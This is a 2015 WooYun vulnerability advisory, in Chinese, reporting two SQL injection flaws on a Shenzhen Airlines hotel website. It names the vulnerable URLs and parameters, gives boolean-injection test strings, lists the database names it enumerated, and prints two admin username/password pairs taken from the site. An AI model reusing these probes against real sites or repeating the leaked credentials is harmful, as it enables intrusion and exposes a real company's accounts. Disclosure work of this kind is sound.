当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111381

漏洞标题:深航酒店mssql注入两枚

相关厂商:深航酒店

漏洞作者: 大懒

提交时间:2015-05-04 12:00

修复时间:2015-06-18 12:02

公开时间:2015-06-18 12:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

深圳市深航物业酒店管理有限公司是深圳航空有限责任公司的全资子公司,专门负责深航在酒店业务领域的发展。自2004年成立以来,先后荣获“中国最佳本土酒店管理集团”、“中国饭店业优秀民族品牌”、“中国酒店业最具投资价值酒店管理公司”、“中国最具发展潜力酒店管理公司”、“广东省十大金牌酒店管理公司”等殊荣, 自2009年至今连续跻身“中国饭店业最具规模饭店管理公司30强”。

详细说明:

1.URL:http://www.szahotel.com/cn/media/news.aspx?keyword=1
存在问题参数是keyword
查询类注入
使用%'%20and%20'x%'='x
2.URL:http://www.szahotel.com/cn/member/Order.aspx?Email=TEST@sina.com&OrderNo=1
存在问题参数是Email、OrderNo
布尔注入
使用'%20and%20'x'='x

漏洞证明:

available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] ShenHang
[*] tempdb
大致了解下,数据库数据大部分是与应用功能业务有关系的
关注了下AdminUsers这张表
抽取10个看了下,就有不少弱口令,例如
simahe/123456789
FCGSHGJ/11111111

修复方案:

1.过滤
2.修改弱口令

版权声明:转载请注明来源 大懒@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论